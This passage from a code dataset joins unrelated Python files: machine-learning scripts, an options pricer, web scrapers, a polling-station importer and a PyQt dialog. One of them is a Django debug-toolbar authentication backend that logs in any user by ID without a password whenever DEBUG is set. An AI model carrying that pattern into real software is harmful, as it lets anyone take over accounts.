0: # First tree is a leaf (max_depth = 1).\n lr = 1. # Learning rate is always 1. 
for the first tree (= leaf).\n tree = decision_tree_library.build_tree(train_set, 1, 2, False)\n else:\n lr = learning_rate\n tree = decision_tree_library.build_tree(train_set, max_depth, 2, False)\n grad_boost.append((lr, tree))\n y_pred = np.zeros(y_train.shape)\n for idx, row in enumerate(train_set):\n pred = decision_tree_library.predict_tree(tree, row)\n y_pred[idx] = pred\n y_pred_cumulated = y_pred_cumulated + lr*y_pred\n residual = y_train - y_pred_cumulated # Use residual as target.\n\n # Plotting results: i-th step.\n if i%10 == 0 or i == n_estimators-1:\n _, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(15, 5))\n ax1.scatter(x_train, y_train, c='k', label='data')\n ax1.set_title('Data')\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.legend()\n ax2.scatter(x_train, y_train, c='k', label='data')\n ax2.scatter(x_train, y_pred_cumulated, c='b', label='predict')\n ax2.set_title(f'Prediction (Iteration {i+1})')\n ax2.set_xlabel('x')\n ax2.set_ylabel('y')\n ax2.legend()\n ax3.scatter(x_train, residual, c='r', label='residual')\n ax3.set_title(f'Residuals vs. 
x (Iteration {i+1})')\n ax3.set_xlabel('x')\n ax3.set_ylabel('Residuals')\n ax3.legend()\n plt.suptitle('Gradient Boosting - Training')\n plt.show()\n\n return grad_boost\n\ndef gradient_boosting_testing(grad_boost, x_test, y_test):\n # Gradient boosting: testing.\n test_set = np.concatenate((x_test, y_test), axis=1)\n y_pred = np.zeros(y_test.shape)\n for idx, row in enumerate(test_set):\n for gb in grad_boost:\n lr, tree = gb\n pred = decision_tree_library.predict_tree(tree, row)\n y_pred[idx] = y_pred[idx] + lr*pred\n\n # Plotting.\n _, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.scatter(x_test, y_test, c='k', label='data')\n ax.scatter(x_test, y_pred, c='b', label='predict')\n ax.set_title('Prediction')\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.legend()\n plt.suptitle('Gradient Boosting - Testing')\n plt.show()\n\ndef main():\n # Gradient boosting: training.\n x_train, y_train = generate_data()\n grad_boost = gradient_boosting_training(x_train, y_train)\n\n # Gradient boosting: testing.\n x_test, y_test = generate_data()\n gradient_boosting_testing(grad_boost, x_test, y_test)\n\nif __name__ == '__main__':\n main()\n","sub_path":"1.supervised/3.decision_tree/gradient_boosting_regression.py","file_name":"gradient_boosting_regression.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"342655260","text":"import datetime as dt\nimport pandas as pd\nimport ctypes\nimport yfinance as yf\nimport openpyxl\nimport concurrent.futures\n\n\nclass Options:\n def __init__(self, stock_tickers=None, initial_data=None, quote_data=None, rate=None):\n self.stock_tickers = stock_tickers\n self.initial_data = initial_data\n self.quote_data = quote_data\n self.rate = rate\n self.option_value = {}\n for ticker in stock_tickers:\n self.option_value[ticker] = []\n\n def thread_marshaller(self):\n with concurrent.futures.ThreadPoolExecutor(max_workers=len(self.stock_tickers)) as 
executor:\n for stock in self.stock_tickers:\n executor.submit(self.options, stock)\n\n return self.option_value\n\n def options(self, stock):\n today = dt.date.today()\n url = f\"../ALGO/Daily Stock Analysis/Options/{stock} Options Data {today}.xlsx\"\n\n handle = ctypes.cdll.LoadLibrary(r\"C:\\Users\\fabio\\source\\repos\\CallPricingDll\\CallPricingDll\\x64\\Rel\"\n r\"ease\\CallPricingDll.dll\")\n\n handle.CallPricing.argtypes = [ctypes.c_float, ctypes.c_float, ctypes.c_float, ctypes.c_float,\n ctypes.c_float]\n handle.CallPricing.restype = ctypes.c_double\n handle.PutPricing.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double,\n ctypes.c_double]\n handle.PutPricing.restype = ctypes.c_double\n\n wb = openpyxl.Workbook()\n wb.save(url)\n book = openpyxl.load_workbook(url)\n writer = pd.ExcelWriter(url, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n try:\n i = 0\n yfticker = yf.Ticker(stock)\n expiration_dates = yfticker.options\n dividend = self.initial_data[stock][0]\n spot = self.quote_data[stock][0]\n\n for expiry in expiration_dates:\n exp = dt.datetime.strptime(expiry, '%Y-%m-%d').date()\n days_expiration = exp - today\n time_to_expiry = int(days_expiration.days)\n\n bond_yield = float(self.rate[0])\n if 30 <= time_to_expiry <= 60:\n bond_yield = float(self.rate[1])\n elif 60 < time_to_expiry <= 91:\n bond_yield = float(self.rate[2])\n elif 91 < time_to_expiry <= 182:\n bond_yield = float(self.rate[3])\n elif time_to_expiry > 182:\n continue\n\n options_chain = yfticker.option_chain(expiry)\n call_table = options_chain.calls\n put_table = options_chain.puts\n call_table['option_value'] = 0.00\n put_table['option_value'] = 0.00\n\n self.option_value[stock].append({expiry: {'overvalued_call_options': 0, 'undervalued_call_options': 0,\n 'overvalued_put_options': 0, 'undervalued_put_options': 0}})\n # calls_well_priced = 0\n # total_calls = 0\n # puts_well_priced = 0\n # 
total_puts = 0\n\n bond_yield -= dividend # dividend should be factored in\n bond_yield -= 0.02 # nominal inflation rate\n\n for index, row in call_table.iterrows():\n sigma = row['impliedVolatility']\n if sigma < 0.0001 or row['bid'] < 0.05 or row['volume'] < 10 or row['openInterest'] < 10:\n continue\n\n strike = row['strike']\n option_price = handle.CallPricing(spot, strike, bond_yield, time_to_expiry, sigma)\n\n call_table.at[index, 'option_value'] = option_price\n spread = (row['bid'] + row['ask']) / 2\n call_table.at[index, 'lastPrice'] = spread\n\n # error = ((option_price - spread) / spread)\n # if -0.05 < error < 0.05:\n # calls_well_priced += 1\n # total_calls += 1\n\n if option_price > spread:\n self.option_value[stock][i][expiry]['undervalued_call_options'] += 1\n if option_price < spread:\n self.option_value[stock][i][expiry]['overvalued_call_options'] += 1\n\n for index, row in put_table.iterrows():\n sigma = row['impliedVolatility']\n if sigma == 0.00 or row['bid'] < 0.05 or row['volume'] < 10 or row['openInterest'] < 10:\n continue\n strike = row['strike']\n\n option_price = handle.PutPricing(spot, strike, bond_yield, time_to_expiry, sigma)\n\n put_table.at[index, 'option_value'] = float(option_price)\n spread = (row['bid'] + row['ask']) / 2\n put_table.at[index, 'lastPrice'] = spread\n\n # error = ((option_price - spread) / spread)\n # if -0.05 < error < 0.05:\n # puts_well_priced += 1\n # total_puts += 1\n\n if option_price > spread:\n self.option_value[stock][i][expiry]['undervalued_put_options'] += 1\n if option_price < spread:\n self.option_value[stock][i][expiry]['overvalued_put_options'] += 1\n\n # pct_well_priced = (calls_well_priced / total_calls) * 100\n # pct_well_priced_2 = (puts_well_priced / total_puts) * 100\n # print(f\"{round(pct_well_priced, 2)}% of calls well priced (within 5% of the bid/ask spread) \"\n # f\"for {stock} options expiring {expiry}\")\n # print(f\"{round(pct_well_priced_2, 2)}% of puts well priced (within 5% of the 
bid/ask spread) \"\n # f\"for {stock} options expiring {expiry}\")\n i += 1\n call_table.to_excel(writer, sheet_name=f'{stock} Calls {expiry}')\n put_table.to_excel(writer, sheet_name=f'{stock} Puts {expiry}')\n except Exception as e:\n print(e)\n finally:\n try:\n sheet = book['Sheet']\n book.remove(sheet)\n except KeyError:\n pass\n book.save(url)\n","sub_path":"Algorithmic Trader Project/module/options_pricing.py","file_name":"options_pricing.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20151649","text":"from debug_toolbar.panels import DebugPanel\nfrom django.contrib.auth.models import User, Group\n#from django.template.context import get_standard_processors\nfrom django.template.loader import render_to_string\n\ndef get_debug_users():\n \"\"\"\n Returns a list if context switchable users based on the criteria outlined\n in settings\n \"\"\"\n users = User.objects.all()\n\n try:\n from settings import DEBUG_TOOLBAR_CONFIG\n if 'USER_EXCLUDE' in DEBUG_TOOLBAR_CONFIG:\n users = users.exclude(**DEBUG_TOOLBAR_CONFIG['USER_EXCLUDE'])\n if 'USER_INCLUDE' in DEBUG_TOOLBAR_CONFIG:\n users = users.filter(**DEBUG_TOOLBAR_CONFIG['USER_INCLUDE'])\n except:\n pass\n \n return users\n\nclass UserDebugPanel(DebugPanel):\n \"\"\"\n A panel to show info about the current user and allow to switch user\n access.\n \"\"\"\n\n name = 'User'\n has_content = True\n\n def title(self):\n return 'Users'\n\n def url(self):\n return ''\n\n def process_request(self, request):\n self.request = request\n\n def content(self):\n\n\n\n groups = Group.objects.all()\n context = {\n 'groups': groups,\n 'active_user': self.request.user,\n 'all_users': get_debug_users(),\n }\n return render_to_string('debug_toolbar/panels/users.html', context)\n\n def get_custom_permissions(self):\n\n from django.contrib.contenttypes.models import ContentType\n# from django.contrib.auth.models import Permission\n 
from django.db.models import get_models\n\n permissions = []\n\n for klass in get_models():\n if klass._meta.permissions:\n ctype = ContentType.objects.get_for_model(klass)\n permissions.append((ctype, klass._meta.permissions ))\n\n return permissions\n#from django.conf import settings\nfrom settings import DEBUG\n\nclass UserDebugPanelAuthentication:\n\n \"\"\"\n This authentication module will accept any login so long as the\n settings.DEBUG variable is set to True.\n \"\"\"\n def authenticate(self, user_id=None):\n try:\n from settings import DEBUG_TOOLBAR_PANELS\n except:\n return None\n\n if not DEBUG \\\n or not 'debug_toolbar.panels.user.UserDebugPanel' \\\n in DEBUG_TOOLBAR_PANELS:\n assert False\n return None\n\n return User.objects.get(pk=user_id)\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n\n","sub_path":"debug_toolbar/panels/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107079045","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.corpus import cess_esp as cess\nfrom nltk import UnigramTagger as ut\n\nimport pandas as pd\nfrom scipy import spatial\nimport numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.spatial.distance import cosine\nimport nltk\n\ndef getPOSFromResponse(string):\n # li = list(string.split(\" \"))\n string = str(string).replace(\"

\", \"\").replace(\"

\", \"\")\n tokens = nltk.word_tokenize(string)\n # str2 = uni_tag.tag(tokens)\n arr = nltk.pos_tag(tokens)\n str2=\"\"\n for(pos,tag) in arr:\n str2 = str2 + tag + \" \"\n newStr = str(str2).replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\",\", \" \").strip()\n return newStr\n\ndef getData(fpInputYear,fpOutputYear):\n my_csv = pd.read_csv(fpInputYear)\n # filtered = my_csv.Score.str.match(\"I-\",na=False)\n # my_csv3 = my_csv2[my_csv2.Score != \"I-UR\"]\n columnResponse = my_csv.Response\n columnScore = my_csv.Score\n columnTestid = my_csv.Testid\n columnTopic = my_csv.Topic\n columnUserName=my_csv.Username\n columnPOS = my_csv.POS\n listSeparateTopic=my_csv.Topic.unique()\n dictTopicResponse = {}\n dictTopicString = {}\n\n strMF = 'I-MF'\n strMM = 'I-MM'\n strSE = 'I-SE'\n strNE = 'I-NE'\n dictScoreResponse = {strMF: [], strMM: [], strSE: [], strNE: []}\n print(listSeparateTopic)\n print(str(len(listSeparateTopic)))\n for item in listSeparateTopic:\n dictTopicResponse[str(item)]=[]\n\n print(str(len(columnResponse)),'\\t',str(len(columnScore)))\n i=-1\n listIndexInExcel=[]\n for item in columnResponse:\n # print(columnScore[i])\n i=i+1\n strScore = str(columnScore[i])\n strScore.strip()\n\n if not (strScore.startswith('I-') and strScore != 'I-UR'):\n continue\n listIndexInExcel.append(i)\n # columnResponse[i]=columnResponse[i].replace(\"

\", \"\").replace(\"

\", \"\")\n # strPOS=getPOSFromResponse(columnResponse[i])\n strResponse = str(columnResponse[i]).replace(\"

\", \"\").replace(\"

\", \"\").replace(\"
\", \"\")\n # print(strResponse)\n strTopic=str(columnTopic[i])\n\n # if strScore == strMF:\n # dictScoreResponse[strMF].append(strResponse)\n # # dictScoreResponse['I-MF'].append(' ')\n # # dictScoreResponse['I-MF'].append(strPOS)\n # elif strScore == strMM:\n # dictScoreResponse[strMM].append(strResponse)\n # # dictScoreResponse['I-MM'].append(' ')\n # # dictScoreResponse['I-MM'].append(strPOS)\n # elif strScore == strSE:\n # dictScoreResponse[strSE].append(strResponse)\n # # dictScoreResponse['I-SE'].append(' ')\n # # dictScoreResponse['I-SE'].append(strPOS)\n # elif strScore == strNE:\n # dictScoreResponse[strNE].append(strResponse)\n # # dictScoreResponse['I-NE'].append(' ')\n # # dictScoreResponse['I-NE'].append(strPOS)\n dictTopicResponse[strTopic].append(strResponse)\n\n\n strTotalIMF = ' '.join(dictScoreResponse[strMF])\n strTotalIMM = ' '.join(dictScoreResponse[strMM])\n strTotalISE = ' '.join(dictScoreResponse[strSE])\n strTotalINE = ' '.join(dictScoreResponse[strNE])\n for item in listSeparateTopic:\n strContentEachTopic = ' '.join(dictTopicResponse[item]).strip()\n if strContentEachTopic:\n dictTopicString[item]=strContentEachTopic\n\n numOfLabelTopic=0\n\n # print(strTotalIMF)\n # corpus = [str(strTotalIMF), str(strTotalIMM), str(strTotalISE), str(strTotalINE)]\n corpus=[]\n for item in dictTopicString:\n corpus.append(str(dictTopicString[item]))\n numOfLabelTopic=numOfLabelTopic+1\n\n for i in range(len(columnResponse)):\n strScore = str(columnScore[i])\n strScore.strip()\n if not (strScore.startswith('I-') and strScore != 'I-UR'):\n continue\n strResponse = str(columnResponse[i]).replace(\"

\", \"\").replace(\"

\", \"\").replace(\"
\", \"\")\n corpus.append(strResponse)\n\n vectorizer = TfidfVectorizer(ngram_range=(1, 4))\n X = vectorizer.fit_transform(corpus)\n arrFeatureNames = vectorizer.get_feature_names()\n print('names: ' + str(len(arrFeatureNames)) + ' ' + str(arrFeatureNames))\n dictTopicVectors = {}\n indexNumTopic=0\n columnTitleRow = \"no,username,testId,topic,\"\n for item in dictTopicString:\n dictTopicVectors[item] = X[indexNumTopic].todense()\n indexNumTopic=indexNumTopic+1\n columnTitleRow=''.join([columnTitleRow,item,\",\"])\n columnTitleRow = ''.join([columnTitleRow, \"\\n\"])\n csv = open(fpOutputYear, 'w')\n\n\n\n csv.write(columnTitleRow)\n\n print(str(len(corpus)))\n for i in range(numOfLabelTopic, len(corpus)):\n vectori = X[i].todense()\n rowList=\"\"\n for item in dictTopicString:\n distItem = cosine_similarity(vectori, dictTopicVectors[item])[0][0]\n rowList = ''.join([rowList, str(distItem), \",\"])\n\n indexCorpus=listIndexInExcel[i-numOfLabelTopic]\n expectedResult = columnTopic[indexCorpus]\n strUsername=columnUserName[indexCorpus]\n strTestId=str(columnTestid[indexCorpus])\n strTopic=str(columnTopic[indexCorpus])\n # strResponse = str(columnResponse[indexCorpus])\n # strPOS = str(columnPOS[indexCorpus])\n row = str(i - numOfLabelTopic+1)+\",\"+strUsername+\",\"+strTestId+\",\"+strTopic+\",\";\n row = ''.join([row,rowList, \"\\n\"])\n print(str(len(corpus))+\" index \"+str(indexCorpus))\n csv.write(row)\n # if(indexCorpus>50):\n # break\n print(listSeparateTopic)\n print(str(len(listSeparateTopic)))\n # indexItemLabel=0\n # for item in dictTopicString:\n # row = ''.join([row, str(lst[indexItemLabel]), \",\"])\n # indexItemLabel=indexItemLabel+1\n # + ',' + str(strTestId)+ ',' + str(strTopic) + ',' + str(distIMF) + ',' + str(distIMM) + ',' + str(distISE) + ',' + str(\n # distINE) + ',' + str(\n # maxDist) + ',' + str(classResult) + ',' + str(expectedResult) + '\\n'\n\n #\n # if distIMF == maxDist:\n # classResult = strMF\n # elif distIMM == maxDist:\n # 
classResult = strMM\n # elif distISE == maxDist:\n # classResult = strSE\n # else:\n # classResult = strNE\n\n # print(\n # str(i) + '\\t' + str(distIMF) + '\\t' + str(distIMM) + '\\t' + str(distISE) + '\\t' + str(distINE) + '\\t' + str(\n # maxDist) + '\\t' + str(classResult))\n # lst.append(distItem)\n\n # distIMM = cosine_similarity(vectori, dictTopicVectors[strMM])[0][0]\n # distISE = cosine_similarity(vectori, dictTopicVectors[strSE])[0][0]\n # distINE = cosine_similarity(vectori, dictTopicVectors[strNE])[0][0]\n\n # distIMF = cosine_similarity(vectori, vectori)[0][0]\n # distIMM = cosine_similarity(vectori, vectori)[0][0]\n # distISE = cosine_similarity(vectori, vectori)[0][0]\n # distINE = cosine_similarity(vectori, vectori)[0][0]\n\n # maxDist = max(lst)\n\n # classResult = strNE\n\ndef main():\n fpInputCombine = 'rpf_combine_2018_2019.csv'\n fpOutputCombine = 'vector_combine.csv'\n fpInputNewYear2019 = 'ratingPositionFilter_newData_2019.csv'\n fpOutputNewYear2019 = 'vector_topic_newData_2019.csv'\n getData(fpInputCombine,fpOutputCombine)\n # getData(fpInputNewYear2019, fpOutputNewYear2019)\n\nmain()\n","sub_path":"replicationPackages/code/spring2020/topicClassification/responseTopic.py","file_name":"responseTopic.py","file_ext":"py","file_size_in_byte":7444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72969740","text":"import requests\r\nfrom you_tango import settings\r\n\r\n\r\ndef run_query(search_terms, size=10):\r\n webhose_api_key = settings.WEBHOSE_API_KEY\r\n root_url = settings.WEBHOSE_ROOT\r\n\r\n try:\r\n res = requests.get(root_url, {\r\n 'token': webhose_api_key,\r\n 'format': 'json',\r\n 'sort': 'relevancy',\r\n 'size': size,\r\n 'q': '{} language:chinese'.format(search_terms),\r\n })\r\n results = res.json()['posts']\r\n\r\n return [{'title': item['title'], 'link': item['url'], 'summary': item['text'][:200]} for item in results]\r\n except Exception as e:\r\n print('run_query error: 
{}'.format(e))\r\n return []\r\n\r\n\r\nif __name__ == '__main__':\r\n ss = run_query('oppo r11s')\r\n pass\r\n","sub_path":"rango/webhose.py","file_name":"webhose.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"646589971","text":"from data_importers.management.commands import BaseHalaroseCsvImporter\n\n\nclass Command(BaseHalaroseCsvImporter):\n council_id = \"MEN\"\n addresses_name = (\n \"2021-03-22T10:35:38.602035/Mendip polling_station_export-2021-03-20.csv\"\n )\n stations_name = (\n \"2021-03-22T10:35:38.602035/Mendip polling_station_export-2021-03-20.csv\"\n )\n elections = [\"2021-05-06\"]\n csv_delimiter = \",\"\n\n def address_record_to_dict(self, record):\n uprn = record.uprn.strip().lstrip(\"0\")\n\n if uprn in [\n \"250002342\", # 15 UNDERHILL CLOSE, STREET\n \"250002337\", # 191B HIGH STREET, STREET\n \"250045108\", # ORCHARD BYRE, POLSHAM, WELLS\n \"250070118\", # NEW MANOR FARM, POLSHAM, WELLS\n \"250011489\", # HONEYSUCKLE COTTAGE, HAVYATT, GLASTONBURY\n \"250044905\", # SUGAR LOAF BARN, KEWARD, WELLS\n \"250054828\", # THE HUNTERS, TADHILL, LEIGH UPON MENDIP, RADSTOCK\n \"250062887\", # THE ANNEXE WITHAM HALL FARM WITHAM HALL FARM TO BUNNS LANE, WITHAM FRIARY, FROME\n \"250030360\", # LILLEYS CIDER, ROEWOOD FARM ESTATE, BUNNS LANE, WEST WOODLANDS, FROME\n \"250060445\", # RIVERSIDE, BUNNS LANE, WEST WOODLANDS, FROME\n \"250072443\", # FROME MEDICAL CENTRE, ENOS WAY, FROME\n \"250040297\", # LITTLE ORCHARD, RUDGE ROAD, STANDERWICK, FROME\n \"250040299\", # MERRION, RUDGE ROAD, STANDERWICK, FROME\n \"250038119\", # MILL COTTAGE, IRON MILL LANE, OLDFORD, FROME\n \"250043259\", # 5 RED HOUSE HOLIDAY HOMES WHITE POST TO CHARLTON ROAD, STRATTON ON THE FOSSE, SHEPTON MALLET\n \"250040953\", # MOUNT PLEASANT, CHILCOMPTON, RADSTOCK\n ]:\n return None\n\n if record.housepostcode in [\n \"BA5 1RJ\",\n \"BA5 3QR\",\n \"BA6 9DH\",\n \"BA6 8DA\",\n \"BA6 
8AP\",\n \"BA4 4BT\",\n \"BA4 4DP\",\n \"BA4 5HB\",\n \"BA3 4DN\",\n \"BA16 0BG\",\n \"BA16 0BD\",\n \"BA16 0JL\",\n \"BA16 0NU\",\n \"BA5 2FF\",\n \"BA11 2ED\",\n \"BA11 2AU\",\n \"BA11 2XG\",\n \"BA11 5EP\",\n \"BA11 2TQ\",\n \"BA11 4AJ\",\n \"BA11 4FJ\",\n \"BA11 5HA\",\n \"BA11 5BT\",\n \"BA3 5QE\",\n \"BA11 4NY\",\n \"BA16 0GJ\",\n \"BA6 8PE\",\n \"BA11 5FE\",\n \"BA5 3DS\",\n ]:\n return None\n\n return super().address_record_to_dict(record)\n","sub_path":"polling_stations/apps/data_importers/management/commands/import_mendip.py","file_name":"import_mendip.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553273468","text":"import json\nimport pandas as pd\nimport spacy\nfrom tqdm import tqdm\nimport os\nimport pdb\n\n\n\n# filename_train = 'data/cleaned_posts.csv'\n\ndef get_freq(word, vocab):\n if word in vocab.keys():\n return vocab[word]\n return 0\ndef eval():\n\n if not os.path.exists('results/eval_raw/'):\n os.makedirs('results/eval_raw/')\n\n lst_file = os.listdir('data/test')\n cpt_file = 0\n\n f = open(\"data/raw/vocabulary.json\", \"r\", encoding='utf-8')\n vocab_all = json.load(f)\n\n f = open(\"data/raw/vocab0.json\", \"r\", encoding='utf-8')\n vocab_0 = json.load(f)\n\n f = open(\"data/raw/vocab1.json\", \"r\", encoding='utf-8')\n vocab_1 = json.load(f)\n\n f = open(\"data/raw/vocab2.json\", \"r\", encoding='utf-8')\n vocab_2 = json.load(f)\n\n df_eval = pd.DataFrame(columns=['text', 'label'])\n\n total_count = 0\n for key in vocab_all.keys():\n total_count += vocab_all[key]\n print('total word count:', total_count)\n # df_txt = pd.read_csv(filename_train)\n\n cpt = 0\n for filename_test in lst_file:\n desc = 'valid_'+str(cpt)\n cpt += 1\n df_txt = pd.read_csv(os.path.join('data/test/', filename_test), header=None)\n\n df_txt.columns = ['text', 'label']\n print('columns', df_txt.columns)\n\n for cpt_row in tqdm(range(len(df_txt)), desc=desc):\n\n 
tokens = tokenizer(df_txt['text'][cpt_row])\n label = df_txt['label'][cpt_row]\n word_count = 0\n freq = 0\n pred = [0, 0, 0]\n for token in tokens:\n token = token.text\n if token in vocab_all.keys():\n word_count = vocab_all[token]\n freq = 1 - word_count/total_count\n\n tmp = get_freq(token, vocab_0)\n pred[0] += tmp/word_count * freq\n\n tmp = get_freq(token, vocab_1)\n pred[1] += tmp/word_count * freq\n\n tmp = get_freq(token, vocab_2)\n pred[2] += tmp/word_count * freq\n\n\n prediction = pred.index(max(pred))\n\n # df_eval.loc[cpt_row] = [df_txt['text'][cpt_row], df_txt['label'][cpt_row]]\n df_eval.loc[cpt_row] = [df_txt['text'][cpt_row], prediction]\n\n df_eval.to_csv(os.path.join('results/eval_raw/', 'evaled_' + filename_test), index=False, header=False)\n\n\nif __name__ == '__main__':\n\n nlp = spacy.load('en_core_web_sm')\n tokenizer = nlp.Defaults.create_tokenizer(nlp)\n eval()","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273535015","text":"import requests\nfrom bs4 import BeautifulSoup\nimport books_server as bs\nimport books as b\n\n# b.add_column_to_table('books','description')\nbook_ids = bs.get_book_ids('description') #book_ids where there is no description\nprint(book_ids)\nfor book_reference_number in book_ids:\n page = requests.get('https://www.goodreads.com/book/show/' +str(book_reference_number[0]))\n#\n soup = BeautifulSoup(page.content, 'html.parser')\n try:\n book_description = (soup.find(id=\"descriptionContainer\").find(style=\"display:none\").get_text())\n print(book_description)\n b.updateTable(book_reference_number[0],'description', book_description)\n except(Exception, AttributeError) as error:\n 
print(error)","sub_path":"backend/Scrapers/BookDescriptionScraper.py","file_name":"BookDescriptionScraper.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219097088","text":"import matplotlib\nimport matplotlib.pyplot as plt\nfrom random import randint\nfrom random import randint, shuffle\nfrom io import BytesIO\nimport base64\nimport requests\nimport json\n\nclass Q_type():\n multichoice = \"multichoice\"\n singlechoice = \"singlechoice\"\n photo = \"photo\"\n shortreply = \"shortreply\"\n\ndef find_x_angel_in_qualdrilateral():\n # setting matplotlib\n font = {'family': 'normal',\n 'weight': 'bold',\n 'size': 16}\n\n matplotlib.rc('font', **font)\n matplotlib.rcParams.update({'text.color': \"white\",\n 'axes.labelcolor': \"blue\"})\n # creating the plot\n x = [1, 0.75, 2.5, 3.5]\n y = [0.5, 1.25, 2, 1]\n fig = plt.figure(figsize=(8, 8))\n plt.axis('equal')\n plt.axis('off')\n\n # generating the question\n question = \"The diagram shows a quadrilateral. 
Find the value of X (NOT TO SCALE)\"\n a = []\n while not(200 < sum(a) < 340):\n a = [randint(30, 150), randint(30, 150), randint(30, 150)]\n\n answer = 360-sum(a)\n wrongs = set()\n while len(wrongs) < 4:\n a_wrong = randint(30, 150)\n if a_wrong != answer:\n wrongs.add(a_wrong)\n\n options = list(wrongs)+[answer]\n text = \"{q}---{a}\\n\\n\".format(q=question, a=answer)\n for i, o in enumerate(options):\n text += \"{i}) {o}\\n\".format(i=chr(i+65), o=o)\n\n # adding the texts\n plt.fill(x, y)\n plt.text(x[0], y[0]+0.1, a[0])\n plt.text(x[1]+0.1, y[1]-0.1, a[1])\n plt.text(x[2]-0.15, y[2]-0.2, a[2])\n plt.text(x[3]-0.3, y[3]+0.07, 'x')\n\n ax = fig.add_subplot(111)\n ax.text(0.5, 2, text, fontsize=13, color='black')\n\n # this is to convert the graph to the text format to send\n image = BytesIO()\n plt.savefig(image, format='png')\n image.seek(0)\n string_image1 = base64.encodebytes(image.getvalue()).decode()\n\n return {\"photo\": string_image1,\n \"q_type\": Q_type.singlechoice,\n \"hint\": [],\n \"solution\": []}\n\n","sub_path":"findX.py","file_name":"findX.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"354486241","text":"import pprint\nimport re\nimport subprocess\n\nfrom PyQt5.QtCore import Qt # , QAbstractTableModel, QVariant\n# from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout # QGridLayout\nfrom PyQt5.QtWidgets import QDialog, QDialogButtonBox\nfrom PyQt5.QtWidgets import QAbstractItemView\nfrom PyQt5.QtWidgets import QPushButton, QLineEdit # QLabel, QMessageBox\n\nimport listofformatswidget\n\n\nclass AddDlg(QDialog):\n \"\"\"AddDlg.\"\"\"\n def __init__(self, model, url, parent=None):\n super(AddDlg, self).__init__(parent)\n self.parent = parent\n self.model = model\n self.formats = []\n\n self.urlEdit = QLineEdit()\n self.btnGetInfo = QPushButton(\"&Info\")\n 
self.btnGetInfo.clicked.connect(self.btnGetInfoClick)\n\n urlBox = QHBoxLayout()\n urlBox.addWidget(self.urlEdit)\n urlBox.addWidget(self.btnGetInfo)\n\n self.listOfFormatsWidget = listofformatswidget.ListOfFormatsWidget()\n self.listOfFormatsWidget.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.listOfFormatsWidget.itemClicked.connect(self.listOfFormatsWidget.clicked)\n self.listOfFormatsWidget.currentItemChanged.connect(self.listOfFormatsWidget.itemChanged)\n\n addButton = QPushButton(\"&Add\")\n addButton.setDefault(True)\n\n buttonBox = QDialogButtonBox(QDialogButtonBox.Cancel)\n buttonBox.addButton(addButton, QDialogButtonBox.AcceptRole)\n buttonBox.accepted.connect(self.addButtonClick)\n buttonBox.rejected.connect(self.reject)\n\n grid = QVBoxLayout()\n grid.addLayout(urlBox)\n grid.addWidget(self.listOfFormatsWidget)\n grid.addWidget(buttonBox)\n\n self.setLayout(grid)\n self.setWindowTitle(\"Add movie\")\n self.setWindowModality(Qt.ApplicationModal)\n self.urlEdit.setText(url)\n self.resize(600, 400)\n # self.exec_()\n\n def addButtonClick(self):\n # TODO(me): add getting of real props instead of 'Кухня 88'\n audio = ''\n video = ''\n print(self.urlEdit.text())\n rows = self.listOfFormatsWidget.selectionModel().selectedRows()\n for row in rows:\n # print(row.data(), \"\\n\")\n matchLine = re.match(r'^(\\d+)\\s', row.data(), re.M | re.I)\n if matchLine:\n # print(\" @@@>>> \", matchLine.group(1))\n matchVideo = re.match(r'^(\\d+)\\s.*DASH video', row.data(), re.M | re.I)\n if matchVideo:\n print(\" @@@ Video >>> \", matchVideo.group(1))\n video = matchLine.group(1)\n matchAudio = re.match(r'^(\\d+)\\s.*DASH audio', row.data(), re.M | re.I)\n if matchAudio:\n print(\" @@@ Audio >>> \", matchAudio.group(1))\n audio = matchLine.group(1)\n\n pp = pprint.PrettyPrinter(indent=4, width=1024)\n # pp.pprint(self.formats)\n \n for f in self.formats:\n print(f)\n\n self.model.addrow(['Кухня 88', video, audio, '0%', self.urlEdit.text(), self.formats, ])\n 
